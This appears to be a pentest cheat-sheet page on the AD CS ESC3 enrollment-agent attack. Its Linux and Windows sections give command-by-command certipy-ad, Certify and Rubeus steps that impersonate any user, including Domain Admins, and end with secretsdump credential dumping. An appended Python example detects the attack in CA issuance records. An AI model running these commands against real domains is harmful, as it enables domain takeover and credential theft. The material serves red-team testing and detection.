ADCSESC3

ESC3: Enrollment Agent abuse — enroll in a Certificate Request Agent template, then use the agent certificate to enroll on behalf of any user (including Domain Admins) in a second template.

Applies to: Users/Computers with Enroll rights → Certificate Request Agent template + target enrollment template → Enterprise CA


Linux Abuse

certipy-ad (two-stage)

# Step 1: Find vulnerable templates
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout

# Step 2: Enroll in the Certificate Request Agent template
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<agent-template>'
# Output: <username>_agent.pfx

# Step 3: Use agent cert to enroll on behalf of target user
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<auth-template>' \
  -on-behalf-of '<domain>\<target-user>' \
  -pfx <username>_agent.pfx
# Output: <target-user>.pfx

# Step 4: Authenticate — get NT hash + TGT
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>

# Step 5: PTH
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'

Windows Abuse

Certify.exe + Rubeus

# Step 1: Find vulnerable templates
Certify.exe find /vulnerable

# Step 2: Enroll in the Enrollment Agent template
Certify.exe request /ca:<ca-host>\<ca> /template:<agent-template>
# Save the issued cert as agent.pfx

# Step 3: Request cert on behalf of target user using agent cert
Certify.exe request /ca:<ca-host>\<ca> /template:<auth-template> /onbehalfof:<domain>\<target-user> /enrollcert:agent.pfx /enrollcertpw:<pfx-password>

# Step 4: Request TGT and inject
Rubeus.exe asktgt /user:<target-user> /domain:<domain> /certificate:<pfx-base64> /password:<pfx-password> /ptt

# Verify
klist

Notes

  • Missing mail attribute: If the template requires it, set mail on the victim account or the enrollment will fail.
  • Missing dNSHostName (computer accounts): Set it on the victim computer object if the template requires it.
  • The agent certificate must have the Certificate Request Agent EKU (1.3.6.1.4.1.311.20.2.1).

Opsec

  • CA retains issued certificates in its store — both the agent enrollment and the on-behalf-of issuance are logged.
  • Two certificate issuance events appear; the requesting principal (attacker) and the subject (target) are both visible.
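Detection example for the two-event pattern described above. This is added here and is not part of the original page or of certipy/Certify: it assumes the CA's issued-certificate store has already been exported and normalised into records with the field names shown (request_id, requester, subject, template, ekus), and it assumes id-kp-clientAuth (1.3.6.1.5.5.7.3.2) is the EKU that makes an issued certificate usable for logon. The sample records are constructed.

```python
"""Flag the ESC3 issuance pattern in certificate-issuance records.

Added detection example (not from the page). Input is a list of dicts
normalised from the CA's issued-certificate store; field names are assumed:
  request_id  - CA request ID (int)
  requester   - account that submitted the request, DOMAIN\\user
  subject     - principal the certificate was issued to, DOMAIN\\user
  template    - template name
  ekus        - list of EKU OIDs present in the issued certificate
"""

# EKU named on the page: Certificate Request Agent
CERT_REQUEST_AGENT_EKU = "1.3.6.1.4.1.311.20.2.1"
# Assumed relevant EKU: id-kp-clientAuth, needed for logon with the cert
CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"


def detect_esc3(records):
    """Return alerts, ordered by request ID.

    high   - requester previously received a Certificate Request Agent
             certificate and then obtained a logon-capable certificate
             whose subject is a different principal (the ESC3 chain).
    medium - subject differs from requester and the cert is logon-capable,
             but no agent enrollment by that requester is in the supplied
             records (incomplete export, or an agent enrolled elsewhere).
    """
    agents = {}   # requester (lower-cased) -> record of their agent enrollment
    alerts = []
    for rec in sorted(records, key=lambda r: r["request_id"]):
        requester = rec["requester"].lower()
        subject = rec["subject"].lower()
        if CERT_REQUEST_AGENT_EKU in rec["ekus"]:
            # Remember the first agent certificate each principal obtained.
            agents.setdefault(requester, rec)
            continue
        if requester == subject or CLIENT_AUTH_EKU not in rec["ekus"]:
            continue  # self-enrollment, or not usable for logon: ignore
        agent = agents.get(requester)
        alerts.append({
            "request_id": rec["request_id"],
            "requester": rec["requester"],
            "subject": rec["subject"],
            "template": rec["template"],
            "severity": "high" if agent else "medium",
            "agent_request_id": agent["request_id"] if agent else None,
        })
    return alerts


# Constructed sample export: a benign self-enrollment, an agent enrollment
# by alice, alice enrolling on behalf of Administrator, and bob enrolling
# on behalf of a service account with no agent certificate in the export.
SAMPLE_RECORDS = [
    {"request_id": 1001, "requester": "CORP\\alice", "subject": "CORP\\alice",
     "template": "User", "ekus": [CLIENT_AUTH_EKU]},
    {"request_id": 1002, "requester": "CORP\\alice", "subject": "CORP\\alice",
     "template": "EnrollmentAgent", "ekus": [CERT_REQUEST_AGENT_EKU]},
    {"request_id": 1003, "requester": "CORP\\alice", "subject": "CORP\\Administrator",
     "template": "User", "ekus": [CLIENT_AUTH_EKU]},
    {"request_id": 1004, "requester": "CORP\\bob", "subject": "CORP\\svc-backup",
     "template": "User", "ekus": [CLIENT_AUTH_EKU]},
]

if __name__ == "__main__":
    for a in detect_esc3(SAMPLE_RECORDS):
        print(f"[{a['severity']}] req {a['request_id']}: {a['requester']} obtained "
              f"{a['template']} cert for {a['subject']} "
              f"(agent cert req {a['agent_request_id']})")
```

The "high" alert is exactly the pair the Opsec notes describe: the agent enrollment (requester == subject, agent EKU) followed by an issuance where the requesting principal and the subject differ. Legitimate enrollment agents produce the same two records, so the requester list should be compared against the accounts actually authorised as agents on the CA before treating a hit as an incident.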